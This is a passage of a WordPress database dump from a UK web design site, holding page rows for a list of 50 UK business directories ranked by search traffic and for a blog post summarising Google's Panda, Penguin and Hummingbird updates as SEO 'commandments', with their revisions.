Directory UK Search Traffic\" />\r\n<h3><a href=\"http://www.approvedbusiness.co.uk/\">Approved Business</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/approvedbusiness.co_.uk_.png\" alt=\"Approved Business Search Traffic\" />\r\n<h3><a href=\"http://www.wheresbest.co.uk/\">Wheres Best</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/wheresbest.co_.uk_.png\" alt=\"Wheres Best Search Traffic\" />\r\n<h3><a href=\"http://www.localpeople.co.uk/home/\">Local People</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localpeople.co_.uk_.png\" alt=\"Local People Search Traffic\" />\r\n<h3><a href=\"http://www.touchlocal.com/\">Touch Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/touchlocal.com_.png\" alt=\"Touch LocalSearch Traffic\" />\r\n<h3><a href=\"http://www.businessmagnet.co.uk/\">Business Magnet</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessmagnet.co_.uk_.png\" alt=\"Business Magnet Search Traffic\" />\r\n<h3><a href=\"http://businessnetwork.co.uk/\">Business Network</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessnetwork.co_.uk_.png\" alt=\"Business Network Search Traffic\" />\r\n<h3><a href=\"http://www.businessitonline.com/busines/\">Business It Online</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessitonline.com_.png\" alt=\"businessitonline Search Traffic\" />\r\n<h3><a href=\"http://www.tuugo.co.uk/\">Tuggo</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/tuugo.co_.uk_.png\" alt=\"Tuggo Search Traffic\" />\r\n<h3><a href=\"http://1stdirectory.co.uk/\">1st Directory</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/1stdirectory.co_.uk_.png\" alt=\"1st Directory Search Traffic\" />\r\n<h3><a href=\"http://www.fyple.co.uk/\">Fyple UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/fyple.co_.uk_.png\" alt=\"Fyple UK Search Traffic\" />\r\n<h3><a href=\"http://www.uk-local-search.co.uk/\">United Kingdom Local Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/uk-local-search.co_.uk_.png\" alt=\"United Kingdom Local Search Search Traffic\" />\r\n<h3><a href=\"http://listz.co.uk/\">ListZ</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/listz.co_.uk_.png\" alt=\"ListZ Search Traffic\" />\r\n<h3><a href=\"http://www.gomy.co.uk/\">Go MY</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/gomy.co_.uk_.png\" alt=\"Go MY Search Traffic\" />\r\n<h3><a href=\"http://www.citylocal.co.uk/\">City Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/citylocal.co_.uk_.png\" alt=\"CityLocal Search Traffic\" />\r\n<h3><a href=\"http://www.ufindus.com/\">U Find Us</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ufindus.com_.png\" alt=\"Ufindus Search Traffic\" />\r\n<h3><a href=\"http://www.thetradefinder.co.uk/\">The Trade Finder</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/thetradefinder.co_.uk_.png\" alt=\"The Trade Finder Search Traffic\" />\r\n<h3><a href=\"http://buzztout.com/businessdirectory/\">Buzz Tout</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/buzztout.com_.png\" alt=\"Buzz Tout Search Traffic\" />\r\n<h3><a href=\"http://www.kellysearch.co.uk/\">Kelly Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/kellysearch.co_.uk_.png\" alt=\"Kelly Search Search Traffic\" />\r\n<h3><a href=\"http://www.placeslocally.co.uk/\">Places Locally</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/placeslocally.co_.uk_.png\" alt=\"Places Locally Search Traffic\" />\r\n<h3><a href=\"http://www.bizbuzz.com/\">BizBuzz</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/bizbuzz.com_.png\" alt=\"Biz Buzz Search Traffic\" />\r\n<h3><a href=\"http://www.searchme4.co.uk/\">Searchme4</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/searchme4.co_.uk_.png\" alt=\"Searchme4 Search Traffic\" />\r\n<h3><a href=\"http://www.businesslinedirectory.com/\">Business Line</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businesslinedirectory.com_.png\" alt=\"Business Line Search Traffic\" />','Top 50 UK Online Business Directories 2017','','publish','closed','closed','','top-50-uk-online-business-directories-2017','','','2017-10-26 08:32:06','2017-10-26 08:32:06','',0,'http://www.dogstardesign.co.uk/?page_id=29',0,'page','',0),(30,1,'2017-10-26 08:32:06','2017-10-26 08:32:06','Over the last two years Google has been killing off link and web directories and it doesnt look like local business directories are having a good time either. Below are list of top 50 online UK business directories ordered by search traffic. Its amazing that some of these sites are still in business.\r\n<h3><a href=\"http://www.yelp.co.uk/\">Yelp</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yelp.co_.uk_.png\" alt=\"Yelp Search Traffic\" />\r\n<h3><a href=\"http://www.yell.com/\">Yell</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yell.com_.png\" alt=\"Yell Search Traffic\" />\r\n<h3><a href=\"http://www.qype.co.uk/\">Qype</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/qype.co_.uk_.png\" alt=\"Qype Search Traffic\" />\r\n<h3><a href=\"https://foursquare.com/\">Foursquare</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/foursquare.com_.png\" alt=\"Foursquare Search Traffic\" />\r\n<h3><a href=\"http://www.localstore.co.uk/\">Local Store</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localstore.co_.uk_.png\" alt=\"Local Store Search Traffic\" />\r\n<h3><a href=\"http://www.4ni.co.uk/\">4NI</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/4ni.co_.uk_.png\" alt=\"4NI Search Traffic\" />\r\n<h3><a href=\"http://www.britinfo.net/\">Britinfo</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/britinfo.net_.png\" alt=\"Britinfo.net Search Traffic\" />\r\n<h3><a href=\"http://www.thomsonlocal.com/\">Thomson Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/thomsonlocal.com_.png\" alt=\"Thomson Local Search Traffic\" />\r\n<h3><a href=\"http://www.118.com\">118.com</a></h3>\r\n<img class=\"aligncenter size-full wp-image-1700\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/118_com.png\" alt=\"118_com\" width=\"944\" height=\"329\" />\r\n<h3><a href=\"http://www.theargus.co.uk/trade_director/\">The Argus Trade Directory</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/theargus.co_.uk_.png\" alt=\"The Argus Trade Directory Search Traffic\" />\r\n<h3><a href=\"http://here.com/\">Here Maps by Nokia</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/here.com_.png\" alt=\"Here Maps by Nokia Search Traffic\" />\r\n<h3><a href=\"http://www.opendi.co.uk/\">Opendi</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/opendi.co_.uk_.png\" alt=\"Opendi Search Traffic\" />\r\n<h3><a href=\"http://www.freeindex.co.uk/\">Free Index</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/freeindex.co_.uk_.png\" alt=\"Free Index Search Traffic\" />\r\n<h3><a href=\"http://www.cylex-uk.co.uk/\">Cylex</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/cylex-uk.co_.uk_.png\" alt=\"Cylex Search Traffic\" />\r\n<h3><a href=\"http://www.misterwhat.co.uk/\">Mister What</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/misterwhat.co_.uk_.png\" alt=\"MisterWhat Search Traffic\" />\r\n<h3><a href=\"http://www.yalwa.co.uk/\">Yalw</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yalwa.co_.uk_.png\" alt=\"Yalw Search Traffic\" />\r\n<h3><a href=\"http://www.ukdirectory.co.uk/\">UK Directory </a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ukdirectory.co_.uk_.png\" alt=\"UK Directory Search Traffic\" />\r\n<h3><a href=\"http://www.applegate.co.uk/\">Applegate</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/applegate.co_.uk_.png\" alt=\"Applegate Search Traffic\" />\r\n<h3><a href=\"http://www.lacartes.com/\">Lacartes</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/lacartes.com_.png\" alt=\"Lacartes Search Traffic\" />\r\n<h3><a href=\"http://www.locallife.co.uk/\">Local Business Listings UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/locallife.co_.uk_.png\" alt=\"Local Business Listings UK Search Traffic\" />\r\n<h3><a href=\"http://ukplaces.com/\">UK Places</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ukplaces.com_.png\" alt=\"Ukplaces.com Search Traffic\" />\r\n<h3><a href=\"http://www.finder.co.uk/\">Finder</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/finder.co_.uk_.png\" alt=\"Finder Search Traffic\" />\r\n<h3><a href=\"http://www.hotfrog.co.uk/\">Hotfrog</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/hotfrog.co_.uk_.png\" alt=\"Hotfrog Search Traffic\" />\r\n<h3><a href=\"http://www.localdatasearch.com/\">The local Data Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localdatasearch.com_.png\" alt=\"The local Data Search Search Traffic\" />\r\n<h3><a href=\"http://www.colourpages.com/\">Colour Pages</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/colourpages.com_.png\" alt=\"Colourpages.com Search Traffic\" />\r\n<h3><a href=\"http://www.mylocalservices.co.uk/\">My Local Services</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/mylocalservices.co_.uk_.png\" alt=\"My Local Services Search Traffic\" />\r\n<h3><a href=\"http://www.scoot.co.uk/\">Scoot</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/scoot.co_.uk_.png\" alt=\"Scoot Search Traffic\" />\r\n<h3><a href=\"http://www.business-directory-uk.co.uk/\">Business Directory UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/business-directory-uk.co_.uk_.png\" alt=\"Business Directory UK Search Traffic\" />\r\n<h3><a href=\"http://www.approvedbusiness.co.uk/\">Approved Business</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/approvedbusiness.co_.uk_.png\" alt=\"Approved Business Search Traffic\" />\r\n<h3><a href=\"http://www.wheresbest.co.uk/\">Wheres Best</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/wheresbest.co_.uk_.png\" alt=\"Wheres Best Search Traffic\" />\r\n<h3><a href=\"http://www.localpeople.co.uk/home/\">Local People</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localpeople.co_.uk_.png\" alt=\"Local People Search Traffic\" />\r\n<h3><a href=\"http://www.touchlocal.com/\">Touch Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/touchlocal.com_.png\" alt=\"Touch LocalSearch Traffic\" />\r\n<h3><a href=\"http://www.businessmagnet.co.uk/\">Business Magnet</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessmagnet.co_.uk_.png\" alt=\"Business Magnet Search Traffic\" />\r\n<h3><a href=\"http://businessnetwork.co.uk/\">Business Network</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessnetwork.co_.uk_.png\" alt=\"Business Network Search Traffic\" />\r\n<h3><a href=\"http://www.businessitonline.com/busines/\">Business It Online</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businessitonline.com_.png\" alt=\"businessitonline Search Traffic\" />\r\n<h3><a href=\"http://www.tuugo.co.uk/\">Tuggo</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/tuugo.co_.uk_.png\" alt=\"Tuggo Search Traffic\" />\r\n<h3><a href=\"http://1stdirectory.co.uk/\">1st Directory</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/1stdirectory.co_.uk_.png\" alt=\"1st Directory Search Traffic\" />\r\n<h3><a href=\"http://www.fyple.co.uk/\">Fyple UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/fyple.co_.uk_.png\" alt=\"Fyple UK Search Traffic\" />\r\n<h3><a href=\"http://www.uk-local-search.co.uk/\">United Kingdom Local Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/uk-local-search.co_.uk_.png\" alt=\"United Kingdom Local Search Search Traffic\" />\r\n<h3><a href=\"http://listz.co.uk/\">ListZ</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/listz.co_.uk_.png\" alt=\"ListZ Search Traffic\" />\r\n<h3><a href=\"http://www.gomy.co.uk/\">Go MY</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/gomy.co_.uk_.png\" alt=\"Go MY Search Traffic\" />\r\n<h3><a href=\"http://www.citylocal.co.uk/\">City Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/citylocal.co_.uk_.png\" alt=\"CityLocal Search Traffic\" />\r\n<h3><a href=\"http://www.ufindus.com/\">U Find Us</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ufindus.com_.png\" alt=\"Ufindus Search Traffic\" />\r\n<h3><a href=\"http://www.thetradefinder.co.uk/\">The Trade Finder</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/thetradefinder.co_.uk_.png\" alt=\"The Trade Finder Search Traffic\" />\r\n<h3><a href=\"http://buzztout.com/businessdirectory/\">Buzz Tout</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/buzztout.com_.png\" alt=\"Buzz Tout Search Traffic\" />\r\n<h3><a href=\"http://www.kellysearch.co.uk/\">Kelly Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/kellysearch.co_.uk_.png\" alt=\"Kelly Search Search Traffic\" />\r\n<h3><a href=\"http://www.placeslocally.co.uk/\">Places Locally</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/placeslocally.co_.uk_.png\" alt=\"Places Locally Search Traffic\" />\r\n<h3><a href=\"http://www.bizbuzz.com/\">BizBuzz</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/bizbuzz.com_.png\" alt=\"Biz Buzz Search Traffic\" />\r\n<h3><a href=\"http://www.searchme4.co.uk/\">Searchme4</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/searchme4.co_.uk_.png\" alt=\"Searchme4 Search Traffic\" />\r\n<h3><a href=\"http://www.businesslinedirectory.com/\">Business Line</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/businesslinedirectory.com_.png\" alt=\"Business Line Search Traffic\" />','Top 50 UK Online Business Directories 2017','','inherit','closed','closed','','29-revision-v1','','','2017-10-26 08:32:06','2017-10-26 08:32:06','',29,'http://www.dogstardesign.co.uk/29-revision-v1',0,'revision','',0),(31,1,'2017-10-26 08:39:11','2017-10-26 08:39:11','<h1>Updates: Panda, Penguin and Hummingbird</h1>\r\n \r\n\r\nHave the number of people visiting your site dropped all of a sudden? Do the numbers tend to fluctuate? Or have you received warnings of unnatural links? As you probably already know, you may have been hit by one of Google\'s algorithm updates Panda and Penguin being the most famous, and Hummingbird the most recent (an overhaul rather an update).\r\n\r\nGoogle have introduced hundreds of these over the years and some of the\r\n\r\nbiggest have turned the SEO world upside down, generating thousands upon thousands of words of debate and comment.\r\n\r\nWhat this post aims to do is summarise how these changes has affected (or should affect) local business\'s web strategies.\r\n\r\nNB As readers as well as content producers, we all know what we want to find online is good content these aren\'t just for the benefit of search engines Your business will benefit from the commandments because people will enjoy looking at your and keep coming back. Hell, maybe even buying something from you!\r\n<h2>Panda Overview</h2>\r\nThis important update first hit Europe in April 2011. With it, Google attempted to crack down on the rubbish content that was, frankly, making the web a boring place to be at the time. Content farms were its main targets websites who had bibles-worth of meaningless content, created only to push their websites higher in Google\'s search rankings.\r\n<h2><b>Panda Commandments</b></h2>\r\n<h3>Thou shalt not copy content from other sites.<b></b></h3>\r\nThat includes scraping, ripping or any other black hat techniques. If you\'re having problems with plagiarisation yourself, here are <a href=\"http://www.jeffbullas.com/2013/04/11/7-tips-and-tools-to-stop-content-thieves-in-their-tracks/\">7 tips and tools</a> to stop it happening.\r\n<h3>Thou shalt not write thin content.</h3>\r\nHere\'s Google\'s <a href=\"https://support.google.com/webmasters/answer/2604719?hl=en\">definition of thin content</a> in case you\'re wondering. Providing rich, quality content that people will spend a bit of time on will help increase your ROI (return on investment) and lower your bounce rate (the number of people leaving your site after viewing only one page).\r\n<h3>Thou shalt not keyword-stuff your content.</h3>\r\nKeyword density used to be all the rage and we\'ve all seen sites with unreadable text. More often than not the reason for this text was simply to provide lots of keywords that Google would latch onto. Google penalizes sites for this content now, so there\'s no point doing it.\r\n<h3>Thou shalt create content aimed at the people who are likely to land on it.</h3>\r\nThe relevance and context of content is much more important than the number of visitors it brings in. For instance, a dental surgery may attract a lot of visitors with a post about cute cats in tutus, but those people won\'t hang around to read posts on root canal work.\r\n<h2><b>Penguin Overview</b></h2>\r\nThe Penguin update targeted unnatural, suspicious-looking link profiles. Up until then, unscrupulous companies were manipulating their search rankings by buying links to their site, and sites with links from very low quality sites were doing better than they should as a result. The quantity of links they had was helping them move up the search engine results, rather than the quality of those links. That changed after Penguin.\r\n<h2>Penguin Commandments</h2>\r\n<h3>Thou shalt not encourage links with overly optimised anchor text. <b></b></h3>\r\nThe reason being, Google likes to see a natural link profile. Interested websites are more likely to link to you using your company\'s name or the title of your В article, rather than a nicely search engine optimised piece of text. Check your backlink profile on <a href=\"https://www.majesticseo.com/\">Majestic SEO</a>.\r\n<h3>Thou shalt not encourage links from sites not relevant to your own content.<b></b></h3>\r\nOnly people interested in the kind of content you offer are likely to link to you, so if the dental surgery receives links from a porn site, Google goes Caught you!\r\n<h3>Thou shalt not over-optimise your web pages.<b></b></h3>\r\nThat\'s not to say you shouldn\'t optimise them just that unscrupulous and not very good SEOs have gone overboard with these practices.\r\n<h3>Thou shalt not receive lots of links all at once.<b></b></h3>\r\nA website that hasn\'t been doing terribly well in attracting links, then all of a sudden brings in a hundred all at once may well be buying them or using some other nefarious method. Unless of course it\'s a website that\'s invested in a piece of fantastic content that\'s been shared here there and everywhere. A pattern of links gained slowly but surely over time looks more natural.\r\n<h3>Thou shalt brand thy business to the hilt</h3>\r\nBranding includes everything from targeting your message and being consistent with your business’s voice, to networking on social media, to making good use of a logo.\r\n<h2><b>Hummingbird Overview</b></h2>\r\nPrecise and fast is what Google calls its new Hummingbird algorithm. Whereas Panda and Penguin were updates to the existing algorithm, Hummingbird is a big wholesale replacement of the old one. That doesn\'t mean that Penguin and Panda are obsolete the principles behind them have been incorporated into Hummingbird.\r\n\r\nIt\'s early days yet and there will be more updates coming to Hummingbird over the coming months. Here\'s an amalgamation of the best theories on working with Hummingbird.\r\n<h2>Hummingbird Commandments</h2>\r\n<h3>Thou shalt not panic.<b></b></h3>\r\nIt\'s a major overhaul yet no-one\'s died “ SEOs didn\'t even notice it happened (Google announced its existence a month after it arrived). Although Google is a moneymaking business whose main aim is make a profit, searchers will desert it if doesn\'t actively try to seek out the most relevant content on any given topic. If you provide that content and share it where you can, you\'ll be seen.\r\n<h3>Thou shalt keep providing excellent content that\'s aligned with the intent of your visitor.</h3>\r\nGoogle is all about intent these days. Search for will I need an umbrella tomorrow on Google and you\'ll be provided with a weather forecast. Google has learned to work out what the customer actually needs even if they don\'t ask for it in the normal search engine way, eg weather forecast London. Put yourself in the mind of your potential visitor and customer and decide what their intention is when they ask for something.\r\n<h3>Thou shalt find ways of search engine-proofing your site so you don\'t have to worry about algorithms.</h3>\r\nFind other ways of getting traffic to your site so that you\'ll be shielded to an extent from the vicissitudes of Google\'s algorithm-fiddling. Build an audience that you can rely on even when you aren\'t getting shown in the search engine ranking pages by growing email lists and marketing to them, blogging, networking yourself and being active on social media.\r\n<h2>Summary</h2>\r\nMuch of what Google is asking for is common sense. To appeal to your customers, you should have them in mind when you create your content. And that content that\'s attracting your customers interactions and visits to your site is what will help you rank in Google. Our next web post is the type of content local businesses can use to get their customers attention.<b>\r\n</b>','Google Algorithms','','publish','closed','closed','','google-algorithms','','','2017-10-26 08:39:25','2017-10-26 08:39:25','',0,'http://www.dogstardesign.co.uk/?page_id=31',0,'page','',0),(32,1,'2017-10-26 08:39:11','2017-10-26 08:39:11','<h1>Updates: Panda, Penguin and Hummingbird</h1>\r\n<img class=\"aligncenter size-full wp-image-1777\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/10/animals.png\" alt=\"animals\" width=\"880\" height=\"300\" />\r\n\r\nHave the number of people visiting your site dropped all of a sudden? Do the numbers tend to fluctuate? Or have you received warnings of unnatural links? As you probably already know, you may have been hit by one of Google\'s algorithm updates Panda and Penguin being the most famous, and Hummingbird the most recent (an overhaul rather an update).\r\n\r\nGoogle have introduced hundreds of these over the years and some of the\r\n\r\nbiggest have turned the SEO world upside down, generating thousands upon thousands of words of debate and comment.\r\n\r\nWhat this post aims to do is summarise how these changes has affected (or should affect) local business\'s web strategies.\r\n\r\nNB As readers as well as content producers, we all know what we want to find online is good content these aren\'t just for the benefit of search engines Your business will benefit from the commandments because people will enjoy looking at your and keep coming back. Hell, maybe even buying something from you!\r\n<h2>Panda Overview</h2>\r\nThis important update first hit Europe in April 2011. With it, Google attempted to crack down on the rubbish content that was, frankly, making the web a boring place to be at the time. Content farms were its main targets websites who had bibles-worth of meaningless content, created only to push their websites higher in Google\'s search rankings.\r\n<h2><b>Panda Commandments</b></h2>\r\n<h3>Thou shalt not copy content from other sites.<b></b></h3>\r\nThat includes scraping, ripping or any other black hat techniques. If you\'re having problems with plagiarisation yourself, here are <a href=\"http://www.jeffbullas.com/2013/04/11/7-tips-and-tools-to-stop-content-thieves-in-their-tracks/\">7 tips and tools</a> to stop it happening.\r\n<h3>Thou shalt not write thin content.</h3>\r\nHere\'s Google\'s <a href=\"https://support.google.com/webmasters/answer/2604719?hl=en\">definition of thin content</a> in case you\'re wondering. Providing rich, quality content that people will spend a bit of time on will help increase your ROI (return on investment) and lower your bounce rate (the number of people leaving your site after viewing only one page).\r\n<h3>Thou shalt not keyword-stuff your content.</h3>\r\nKeyword density used to be all the rage and we\'ve all seen sites with unreadable text. More often than not the reason for this text was simply to provide lots of keywords that Google would latch onto. Google penalizes sites for this content now, so there\'s no point doing it.\r\n<h3>Thou shalt create content aimed at the people who are likely to land on it.</h3>\r\nThe relevance and context of content is much more important than the number of visitors it brings in. For instance, a dental surgery may attract a lot of visitors with a post about cute cats in tutus, but those people won\'t hang around to read posts on root canal work.\r\n<h2><b>Penguin Overview</b></h2>\r\nThe Penguin update targeted unnatural, suspicious-looking link profiles. Up until then, unscrupulous companies were manipulating their search rankings by buying links to their site, and sites with links from very low quality sites were doing better than they should as a result. The quantity of links they had was helping them move up the search engine results, rather than the quality of those links. That changed after Penguin.\r\n<h2>Penguin Commandments</h2>\r\n<h3>Thou shalt not encourage links with overly optimised anchor text. <b></b></h3>\r\nThe reason being, Google likes to see a natural link profile. Interested websites are more likely to link to you using your company\'s name or the title of your В article, rather than a nicely search engine optimised piece of text. Check your backlink profile on <a href=\"https://www.majesticseo.com/\">Majestic SEO</a>.\r\n<h3>Thou shalt not encourage links from sites not relevant to your own content.<b></b></h3>\r\nOnly people interested in the kind of content you offer are likely to link to you, so if the dental surgery receives links from a porn site, Google goes Caught you!\r\n<h3>Thou shalt not over-optimise your web pages.<b></b></h3>\r\nThat\'s not to say you 